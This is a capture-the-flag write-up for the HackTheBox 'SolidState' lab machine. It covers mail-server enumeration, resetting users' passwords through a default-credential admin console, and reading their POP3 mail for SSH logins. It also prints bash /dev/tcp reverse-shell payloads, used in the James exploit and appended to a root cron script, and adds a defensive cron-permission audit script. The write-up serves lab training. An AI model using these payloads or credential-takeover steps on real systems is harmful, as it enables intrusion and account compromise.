HackTheBox — SolidState Writeup

ZeusCybersec
6 min read · Nov 29, 2022

SolidState is a medium-level, OSCP-like Linux box on HackTheBox. In this machine we deal with the rsip and POP3 services, the James exploit, and privilege escalation via a cron job. I will also cover a rabbit hole I fell into that hasn't been mentioned in any other writeup. Do note that there are two ways to get an initial shell on this box: one is by finding SSH credentials and the other is by exploiting James Server 2.3.2.

Enumeration

We find various ports open. After running autorecon I also discovered port 4555 open. You need to do a full nmap scan of all TCP ports to find it.

I ran gobuster against the webpage running on port 80, but I did not find anything interesting.

I checked all the folders in the assets directory but did not find anything there either.

ENUMERATING SMTP PORT 25

Let's first scan SMTP with nmap's NSE scripts. I did not find any CVEs. For more info on enumerating SMTP, refer to hacktricks: https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp

Let's connect to SMTP. Nothing interesting found.

Now let's enumerate rsip running on port 4555. I did not find a guide on hacktricks, but I found one in an online cheat sheet: https://cheatsheet.haax.fr/network/services-enumeration/4555_rsip/

Let's connect to rsip.

REFER: https://cheatsheet.haax.fr/network/services-enumeration/4555_rsip/

When we connect to rsip it asks for a username and password. We try root:root and it works! Next we run the HELP command to see what commands we can run. One command that stands out is "setpassword".

We run the "listusers" command to see all the users, then change their passwords using the "setpassword" command, e.g. we set james's password to james and mindy's password to mindy. You can set whatever password you wish.

Once we have all the usernames and the passwords we set, it's time to log in as each user and see what is in their mail. As you know, the POP3 service is used for this job, so let's connect to it.

GUIDE FOR POP3: https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop

As you can see below, we connect to POP3, log in as user mindy with her password (mindy), and once we are in we run the LIST command to show all mails. We find 2 mails. To read the first mail (1109) we run the command retr 1. (NOTE: everything is explained in the link above; the hacktricks guide lists all the POP3 commands you can run.)

Then we run retr 2 to read the second mail (836). The mail contains mindy's SSH username and password.

We connect as mindy using → ssh mindy@<target-ip>

ALTERNATE METHOD

We can also get a shell by exploiting the James Server v2.3.2 running on port 4555. I found this in ippsec's video.

Apache James Server 2.3.2 (Remote Command Execution): https://www.exploit-db.com/exploits/35513

The usage is pretty simple. You need to edit the exploit and set the payload to a reverse shell (change line 19 of the exploit to the following, substituting your own listener IP and port; the payload is a Python string, so keep the quotes):

payload = 'bash -i >& /dev/tcp/10.10.14.23/1234 0>&1'

Now run the exploit → python exploit.py <target-ip>

Start a netcat listener on port 1234 on your Kali box and connect as user mindy over SSH, which will trigger the exploit.

ssh mindy@<target-ip>

SO WE HAVE A SHELL!

However, when we try to run basic commands like cd, they do not work. I ran echo $BASH to see what type of shell we have, and it's rbash (restricted bash), meaning you can only run a limited set of commands here.

We have to escape this jail shell. If I run the ssh command with bash at the end, it gives me a bash shell where I can run all commands.

Refer: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/escaping-from-limited-bash#get-bash-from-ssh

Now we have a proper shell!

RABBIT HOLE!!!

This is a rabbit hole I fell into. I ran linpeas on the target and found port 632 listening locally.

I ran curl against it to see what it returned, and I saw a website for www.cups.org running (see the last line).

I did SSH local port forwarding: I forwarded the target's port 631 to port 9005 on my Kali box.

In my Kali browser I went to port 9005 and found the website running along with its version, CUPS 2.2.1. I was tempted and found an RCE exploit; however, it did not work in the end.

Turns out this was not the intended way and a big rabbit hole. So let me cover the intended way to privilege escalate and finish this box.

PRIVILEGE ESCALATION

I ran pspy32 on the target and found a cron job running the tmp.py file every 3 minutes.

I read the contents of the tmp.py file, which contains a basic Python script that removes all files within the /tmp folder. Next, when I ran ls -la on the file to see its permissions, I saw that we have full access to it (rwx: read, write, execute).

All we have to do is add a Python reverse shell at the end of the script and wait for the cron job to run.

I tried the Python 2 reverse shell script given below; however, I did not get a shell in my netcat, just a connect message.

Turns out that the only command that will work on this box is:

os.system('bash -c "bash -i >& /dev/tcp/10.10.14.47/443 0>&1"')

We add it to the end of the file, start our netcat listener and wait for the cron job to run, and voilà! We get a shell as root.
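The root cause of this privilege escalation is a root-owned cron job executing a script that an unprivileged user can modify. The following audit script is an added example written for this writeup, not code from the box or from the writeup itself: it parses /etc/crontab-style entries, works out which file cron actually executes (the script, not the interpreter), and flags targets that are world- or group-writable, missing, or owned by someone other than root while running as root. The crontab text, the paths (/opt/tmp.py and the others) and the temporary files it creates are all constructed placeholders so the example runs offline; the path_map argument is a helper I added to remap those placeholder paths onto the temporary files.

```python
"""Audit cron entries for scripts that a lower-privileged user could edit.

Added example (not from the writeup or the box). A root cron job that runs a
writable script is exactly the condition exploited above, so this flags it.
"""
import os
import re
import stat
import tempfile

# Constructed sample crontab; /opt/tmp.py and the other paths are placeholders.
SAMPLE_CRONTAB = """\
# m  h  dom mon dow user      command
*/3  *  *   *   *   root      python /opt/tmp.py
0    2  *   *   *   root      /usr/local/bin/backup.sh
*/5  *  *   *   *   www-data  php /var/www/health.php
*/10 *  *   *   *   root      /opt/cleanup/missing.sh
"""

# For "python script.py"-style commands the file that matters is the second token.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "php"}


def parse_crontab(text):
    """Yield (schedule, user, command) tuples; skips comments, blanks and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)          # 5 schedule fields, user, rest of command
        if len(fields) < 7:
            continue
        yield " ".join(fields[:5]), fields[5], fields[6]


def target_of(command):
    """Return the file cron will actually execute (the script rather than its interpreter)."""
    parts = command.split()
    if not parts:
        return None
    if os.path.basename(parts[0]) in INTERPRETERS and len(parts) > 1:
        return parts[1]
    return parts[0]


def audit_cron(text, path_map=None):
    """Return a list of (user, path, reason) findings for risky cron targets.

    path_map (added for this example) remaps the crontab's paths onto files that
    exist locally, so the check can run against constructed temporary files."""
    path_map = path_map or {}
    findings = []
    for _schedule, user, command in parse_crontab(text):
        logical = target_of(command)
        real = path_map.get(logical, logical)
        if real is None:
            continue
        if not os.path.exists(real):
            # A missing target is as bad as a writable one: whoever can create it runs as `user`.
            findings.append((user, logical, "target missing: whoever can create it runs as " + user))
            continue
        st = os.stat(real)
        if st.st_mode & stat.S_IWOTH:
            findings.append((user, logical, "world-writable"))
        elif st.st_mode & stat.S_IWGRP:
            findings.append((user, logical, "group-writable"))
        if user == "root" and st.st_uid != 0:
            findings.append((user, logical, "runs as root but owned by uid %d" % st.st_uid))
    return findings


def build_demo_files():
    """Create temporary files reproducing the permission mix above (a 0777 script run by root)."""
    tmpdir = tempfile.mkdtemp(prefix="cron-audit-")
    modes = {"/opt/tmp.py": 0o777, "/usr/local/bin/backup.sh": 0o755, "/var/www/health.php": 0o664}
    path_map = {}
    for logical, mode in modes.items():
        real = os.path.join(tmpdir, os.path.basename(logical))
        with open(real, "w") as fh:
            fh.write("# constructed placeholder\n")
        os.chmod(real, mode)
        path_map[logical] = real
    return path_map


if __name__ == "__main__":
    for user, path, reason in audit_cron(SAMPLE_CRONTAB, build_demo_files()):
        print("[%s] %s -> %s" % (user, path, reason))
```

On a real host you would drop the path_map and feed it the contents of /etc/crontab and the files under /etc/cron.d; any root entry reported as world-writable is the SolidState situation, and the fix is to make the script root-owned with mode 0755 (or 0700) and to keep it out of directories that unprivileged users can write to.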

CONCLUSION

This was a fun and interesting box. I hope you learned something from this writeup. For more such OSCP-like CTF writeups and cybersecurity articles, make sure to follow me here on Medium. — ZEUS

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Security Tools using Python. YouTube-ZeusCybersec